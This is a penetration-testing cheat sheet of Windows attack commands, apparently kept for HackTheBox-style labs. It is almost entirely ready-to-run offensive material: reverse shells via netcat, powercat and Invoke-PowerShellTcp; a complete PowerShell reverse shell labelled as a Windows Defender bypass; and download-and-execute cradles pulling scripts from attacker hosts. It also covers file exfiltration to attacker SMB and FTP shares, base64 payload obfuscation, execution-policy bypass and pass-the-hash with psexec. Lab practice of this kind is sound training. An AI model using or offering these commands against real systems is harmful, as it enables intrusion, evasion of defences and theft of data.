Useful commands

Reverse Shell File

# Payload
https://podalirius.net/en/articles/windows-reverse-shells-cheatsheet/

# File
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Client

#Add at the end of the file 
Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port <attacker-port>

#Host the file 
python3 -m http.server 8888

#Set up listener 
nc -nlvp 4444

Server

powershell IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:4444/shell.ps1')

Client

#Set up listener
nc -nlvp 4444

#Host the file in share folder (run from above)
impacket-smbserver -smb2support share share

Server

#Download the file
copy \\<IP>\share\nc.exe .

#Run command
nc.exe <IP> <PORT> -e cmd

Set up http server with powercat:

powercat path: /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1

python3 -m http.server 8888

Set up listener

nc -nlvp 4444

Execute PowerShell command

IEX (New-Object System.Net.Webclient).DownloadString("http://<ATTACKER_IP>:<FILESERVER_PORT>/powercat.ps1");powercat -c <ATTACKER_IP> -p <ATTACKER_NC_PORT> -e powershell

Windows Defender Bypass

$h = "<IP>"; $p = <PORT>; $c = New-Object Net.Sockets.TCPClient($h, $p); $n = $c.GetStream(); $r = New-Object IO.StreamReader($n); $w = New-Object IO.StreamWriter($n); $w.AutoFlush = $true; $b = New-Object System.Byte[] 1024; while ($c.Connected) { while ($n.DataAvailable) { $d = $n.Read($b, 0, $b.Length); $s = ([text.encoding]::UTF8).GetString($b, 0, $d - 1) }; if ($c.Connected -and $s.Length -gt 1) { $o = try { Invoke-Expression ($s) 2>&1 } catch { $_ }; $w.Write("$o`n"); $s = $null } }; $c.Close(); $n.Close(); $r.Close(); $w.Close()

Reverse shell generator

https://www.revshells.com

File upload

Client

python3 -m http.server 8888

Server

powershell "IEX (New-Object Net.WebClient).DownloadString('http://X.X.X.X:8888/file.ps1')"

(Optional) Downloads folder

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.35:8888/40584.exe',

Client

impacket-smbserver -smb2support share share/

Server

copy \\<IP>\share\file.ext .

Client

python3 -m http.server 8888

Server

certutil.exe -urlcache -f http://<IP>:<PORT>/file.ext file.ext

Set up http server:

python3 -m http.server <PORT>

Download the file:

iwr -uri http://<IP>/<FILE> -Outfile <FILE>

Set up apache2 service:

sudo systemctl start apache2

Transfer files to the following location:

/var/www/html/

Execute on the windows machine to download the file:

powershell wget -Uri http://<IP>/<FILE> -OutFile <SAVE_DESTINATION/FILE>

File exfiltration

Kali

python3 -m pyftpdlib -p 21 -w

Windows

Kali:

impacket-smbserver -smb2support share share -user test -password test

Windows:

net use \\<ATTACKER_IP>\share /user:"test" test

copy <WINDOWS_LOCAL_FILE> \\<ATTACKER_IP>\share

Check if command is executed via cmd or powershell

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

World writeable paths

c:\windows\system32\microsoft\crypto\rsa\machinekeys
c:\windows\system32\tasks_migrated\microsoft\windows\pla\system
c:\windows\syswow64\tasks\microsoft\windows\pla\system
c:\windows\debug\wia
c:\windows\system32\tasks
c:\windows\syswow64\tasks
c:\windows\tasks
c:\windows\registration\crmlog
c:\windows\system32\com\dmp
c:\windows\system32\fxstmp
c:\windows\system32\spool\drivers\color
c:\windows\system32\spool\printers
c:\windows\system32\spool\servers
c:\windows\syswow64\com\dmp
c:\windows\syswow64\fxstmp
c:\windows\temp
c:\windows\tracing

Check writeable paths script

Get-ChildItem -Directory -Recurse | ForEach-Object { if (Test-Path -Path $_.FullName -PathType Container -ErrorAction SilentlyContinue -OutVariable +global:output -ErrorVariable +global:errvar) { $_.FullName } }

Internal port forwarding

HTB blocks port 22 usage. In order to bypass that set the port to 2222 in sshd_config file. Also during the plink usage you have to specify the port by using -P 2222 flag.

Kali ssh configuration

nano /etc/ssh/sshd_config

Uncomment and change the PermitRootLogin line to:

PermitRootLogin yes

Then enter this command in the terminal

service restart ssh

service ssh start

Connection

Download plink.exe https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Upload plink to the server using the way described in File Upload section.

Connect to kali ssh.

ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Hit enter multiple times.

Check if port is open on kali localhost

netstat -ano

Connect to the open port using 127.0.0.1 IP on kali

Connections

RDP Connection

Normal

xfreerdp /v:<IP> /u:<USER> /p:<PASSWORD>

Retina display (MAC)

xfreerdp /v:<IP> /u:<USER> /p:<PASSWORD> /scale:180 /scale-desktop:200 /w:2560 /h:1440

Domain

xfreerdp /v:<IP> /u:<DOMAIN>\\<USER> /p:<PASSWORD> /scale:180 /scale-desktop:200 /w:2560 /h:1440

Evil-winrm

In order to use evil-winrm you need username and password of the user. Also make sure ports: 5985 or 5986 are open.

evil-winrm -i <IP_ADDRESS> -u <USERNAME> -p <PASSWORD>

PsExec /wmiexec / smbexec

You can use psexec, smbexec if you have user credentials or NTLM hash. Any folder has to be writeable.

Credentials

impacket-psexec <domain>/<user>:<password>@<victim_ip>

Hash

impacket-psexec <domain>/<user>@<victim_ip> -hashes <LMHash:NTHash> # you can fill LMHash with 32 0

Powershell BASE64 obfuscation

The command is encoded in Unicode (UTF-16) format.

Get the payload

$command = '<COMMAND_TO_ENCODE>'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand

Execute the payload

powershell -enc <ENCODED_PAYLOAD>

Powershell scripts do not run

Run the powershell in bypass mode:

powershell -ep bypass

Windows kernel exploits

https://github.com/SecWiki/windows-kernel-exploits

PreviousWindows NextPort Forwarding and SSH Tunneling

Last updated 11 months ago